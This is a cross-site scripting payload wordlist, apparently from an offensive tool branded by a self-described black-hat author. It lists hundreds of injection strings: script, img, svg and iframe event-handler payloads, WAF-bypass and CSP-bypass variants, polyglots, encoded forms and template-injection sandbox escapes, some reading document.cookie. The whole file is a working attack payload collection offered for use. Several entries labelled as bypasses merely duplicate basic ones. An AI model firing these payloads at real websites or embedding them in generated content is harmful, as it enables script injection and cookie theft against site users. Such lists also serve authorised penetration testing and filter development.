# wordlists/xss_payloads.txt
# WOLFSTRIKE XSS Payloads
# Author: ATHEX BLACK HAT | Team: Wolf Intelligence PK
# Categories: Basic, Advanced, Bypass, DOM-based, Polyglot

# === BASIC XSS PAYLOADS ===
<script>alert(1)</script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>prompt(1)</script>
<script>confirm(1)</script>
<script>console.log(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
</script><script>alert(1)</script>
<script>alert(1)</script>
<script>alert(1)</script>

# === IMG TAG PAYLOADS ===
<img src=x onerror=alert(1)>
<img src=x onerror=alert("XSS")>
<img src=x onerror=prompt(1)>
<img src=x onerror=confirm(1)>
<img src=1 onerror=alert(1)>
<img src=x onerror=alert(1) //
<img src=x onerror=alert(1)><!--
<img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(document.domain)>

# === SVG PAYLOADS ===
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert("XSS")>
<svg><script>alert(1)</script></svg>
<svg onload=prompt(1)>
<svg/onload=confirm(1)>
<svg><animatetransform onbegin=alert(1)>

# === BODY TAG PAYLOADS ===
<body onload=alert(1)>
<body onload=alert("XSS")>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onresize=alert(1)>
<body onscroll=alert(1)>
<body onerror=alert(1)>

# === IFRAME PAYLOADS ===
<iframe src=javascript:alert(1)>
<iframe src="javascript:alert(1)">
<iframe srcdoc="<script>alert(1)</script>">
<iframe onload=alert(1)>
<iframe src=data:text/html,<script>alert(1)</script>>

# === EVENT HANDLER PAYLOADS ===
<details open ontoggle=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<marquee onstart=alert(1)>
<marquee onfinish=alert(1)>
<isindex type=image src=1 onerror=alert(1)>
<object data="data:text/html,<script>alert(1)</script>">
<embed src="data:text/html,<script>alert(1)</script>">

# === WAF BYPASS PAYLOADS ===
<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg/onload=alert(1)>
<svg/onload=alert(1)>
<svg><script>alert(1)</script>
<details/open/ontoggle=alert(1)>

# === DOM-BASED XSS PAYLOADS ===
#"><img src=x onerror=alert(1)>
javascript:alert(1)
"><script>alert(1)</script>
'><script>alert(1)</script>
"-alert(1)-"
';alert(1);//
"><svg/onload=alert(1)>
#"><img src=x onerror=prompt(1)>

# === JAVASCRIPT URI PAYLOADS ===
javascript:alert(1)
javascript:alert("XSS")
javascript:prompt(1)
javascript:confirm(1)
javascript:void(alert(1))
javascript:alert(document.cookie)
javaSCRIPT:alert(1)
JaVaScRiPt:alert(1)

# === POLYGLOT PAYLOADS ===
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>

# === HTML5 PAYLOADS ===
<video poster=javascript:alert(1)>
<audio src=x onerror=alert(1)>
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
<form><button formaction=javascript:alert(1)>click
<button formaction=javascript:alert(1)>click
<input type=image src=x onerror=alert(1)>

# === CSP BYPASS PAYLOADS ===
<script src="data:text/javascript,alert(1)"></script>
<link rel=import href="data:text/html,<script>alert(1)</script>">
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<base href="javascript:/"><a href="alert(1)">click</a>

# === ENCODED PAYLOADS ===
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
%3Csvg%20onload%3Dalert(1)%3E
%253Cscript%253Ealert(1)%253C%252Fscript%253E
&#60;script&#62;alert(1)&#60;/script&#62;
\x3Cscript\x3Ealert(1)\x3C/script\x3E
\u003Cscript\u003Ealert(1)\u003C/script\u003E

# === TEMPLATE INJECTION XSS ===
{{constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}